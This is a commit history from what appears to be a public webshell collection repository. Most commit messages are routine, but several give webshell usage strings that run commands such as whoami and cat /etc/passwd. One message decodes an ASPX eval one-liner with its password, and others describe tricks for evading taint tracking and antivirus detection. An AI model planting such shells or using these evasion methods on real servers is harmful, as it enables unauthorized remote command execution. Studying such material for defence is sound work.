Commit graph

663 commits

Author SHA1 Message Date
tennc
4c6e0b8dd9
Create 2022-08-26-02.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
useage: http://example.com/shell7php?f=system&a=whoami&p=\_
2022-08-26 19:48:27 +08:00
tennc
bd520ddddc
Create 2022-08-26-01.php
useage: http://example.com/shell7php?f=system&a=whoami&p=\_
from : https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
2022-08-26 19:47:14 +08:00
tennc
ffb2c01bdc
add 一句话木马的精简史.md
from : https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
一句话木马的精简史.md
2022-08-26 19:44:28 +08:00
tennc
43c3fd24a3
Create system2022-08-22-4.php
from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1=whoami
2022-08-22 22:42:23 +08:00
tennc
a5b681ccf8
Create system2022-08-22-3.php
from: https://zhuanlan.zhihu.com/p/550150061
__FILE__是PHP的一个魔术常量,它会返回当前执行PHP脚本的完整路径和文件名,我们利用substr()函数逆着截取,就能获得system再利用变量做函数的方式,打断了污点追踪的过程,进行命令执行,也可以成功bypass掉牧云引擎。
usage:
file:xxx.php
post: body==>1=whoami
2022-08-22 22:40:18 +08:00
tennc
615c74bdec
Create system2022-08-22-2.php
from: https://zhuanlan.zhihu.com/p/550150061

usage: xxx.php?1[]=system&1[]=a&1[]=b&2=whoami
2022-08-22 22:37:10 +08:00
tennc
c9540e5a85
Create system2022-08-22.php
from : https://zhuanlan.zhihu.com/p/550150061
该样本需要一些条件,前提是开启了php-xml拓展才可以,其原理就是用XML去注册一个registerPHPFunctions,也就是我们想要执行的system再利用getClosure去触发该方法而构成的webshell,其中即利用到了PHP的特性,利用registerNamespace和registerPHPFunctions来中断污点追踪,从而RCE
usage: xxx.php?3=whoami
2022-08-22 22:32:44 +08:00
tennc
a6e6672291
add msmap 2022-08-20 @hosch3n 👍
From: https://github.com/hosch3n/msmap
Author : hosch3n
2022-08-20 17:25:19 +08:00
tennc
1f2fc9c832
Update README.md 2022-08-20 17:21:44 +08:00
tennc
5142495a2a
Create README.md 2022-08-20 17:20:08 +08:00
tennc
39cf8cacca
Create simple_2022_08_15.php
running : system('cat /etc/passwd')
![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
2022-08-15 00:46:41 +08:00
tennc
95f12107a7
Add files via upload
upload png with simple2022_08_15.php pic
2022-08-15 00:45:05 +08:00
tennc
d31dd250f0
Rename 2022-08-12.asp.txt to 2022-08-12.aspx.txt
decode core code:
608592;var safe="unsafe";eval(Request.Item['pass'], safe);1825776;

pass:pass
2022-08-12 00:54:31 +08:00
tennc
08dd7f3ed2
Update 2022-08-12.asp.txt 2022-08-12 00:41:23 +08:00
tennc
a778458785
Create 2022-08-12.asp.txt
not decode
2022-08-12 00:25:56 +08:00
tennc
8f9a481d39
Update README.md 2022-08-08 22:39:13 +08:00
tennc
19450447f7
Create WebSocket 内存马,一种新型内存马技术.md
from: https://mp.weixin.qq.com/s/XwWqTBeeaR9Vq8Htr2vKcQ
Author: veo
2022-08-08 22:33:21 +08:00
tennc
e4f97e3722
Update .gitmodules 2022-08-05 23:29:24 +08:00
tennc
45910b1865
Add files via upload
from: https://xz.aliyun.com/t/11391
author: suansuan
2022-08-05 23:24:59 +08:00
tennc
ddc544e992
Create 简单的冰蝎流量魔改.md
from: https://xz.aliyun.com/t/11530
aythor: Credink
2022-08-05 23:15:17 +08:00
tennc
9bb3f1b806
Create 几种实战成功过的webshell的免杀方式.md
from: https://xz.aliyun.com/t/10937

author: Icepaper
2022-08-05 23:10:13 +08:00
tennc
795d0a1039
Create LICENSE 2022-08-01 23:31:11 +08:00
tennc
ccba530eec
Update readme.md 2022-08-01 23:15:02 +08:00
tennc
3f960943e0
Update readme.md 2022-08-01 23:14:29 +08:00
tennc
21dbbbee7f
Update readme.md 2022-08-01 23:13:47 +08:00
tennc
bd7551a9db
Update readme.md 2022-08-01 23:13:01 +08:00
tennc
59be8c0a37
Update readme.md 2022-08-01 23:12:44 +08:00
tennc
a14652d3bc
Merge pull request #55 from foulenzer/typo_fix
fixed typo
2022-07-26 22:14:42 +08:00
tennc
36b676748f
Update .NET WebShell 免杀系列之Unicode编码.md 2022-07-26 13:28:26 +08:00
tennc
fc5099cf0d
Rename .NET WebShell 免杀系列之Unicode编码 to .NET WebShell 免杀系列之Unicode编码.md 2022-07-26 13:27:39 +08:00
tennc
cb5203e131
Create .NET WebShell 免杀系列之Unicode编码
Author:[dotNet安全矩阵](doNetSafety) WX公众号
2022-07-26 13:27:13 +08:00
tennc
996152da78
add wsmemshell
thanks @veo
2022-07-26 13:09:53 +08:00
tennc
1643b37786
add wsmemshell readme 2022-07-26 13:07:46 +08:00
tennc
e35c908f48
Create readme.md 2022-07-26 13:06:27 +08:00
tennc
638c20250e
Create LICENSE 2022-07-26 13:00:44 +08:00
tennc
6c7c4681fe
Update README.md 2022-07-26 12:59:37 +08:00
tennc
1ba4ac2b81
Update readme.md 2022-07-26 12:58:15 +08:00
tennc
062a4e2891
Create readme.md 2022-07-26 12:57:36 +08:00
tennc
710355afbb
Delete codeql-analysis.yml 2022-05-08 14:19:17 +08:00
foulenzer
11c12cca75 fixed typo 2022-04-12 09:37:10 -04:00
tennc
59661e7c8a
Update .gitmodules 2022-03-24 23:06:38 +08:00
tennc
09f16a51e5
Create codeql-analysis.yml 2022-03-24 22:58:33 +08:00
tennc
4d650897ec
Create 20220213_06.php 2022-02-13 22:38:53 +08:00
tennc
e421f51b5a
Create 20220213_05.php
from : https://github.com/eddie222-diamond/php/blob/main/head.php
2022-02-13 22:37:02 +08:00
tennc
9640d18e26
Create 20220213_04.php 2022-02-13 22:33:58 +08:00
tennc
b9f06d9682
Create 20220213_03.php 2022-02-13 22:28:25 +08:00
tennc
5f2e172790
Create 20220213_02.php 2022-02-13 22:27:55 +08:00
tennc
ccf2230bfa
Create 20220213.php
add godzilla php webshell
2022-02-13 22:24:49 +08:00
tennc
44e785c4cc
Merge pull request #53 from its0x08/patch-1
15 bytes long PHP payload to achieve RCE!
2022-02-12 22:32:50 +08:00
0x08
e12f91f024
15 bytes long PHP payload to achieve RCE!
Usage:
http://127.0.0.1/?_=ls
2022-02-05 20:01:07 +03:00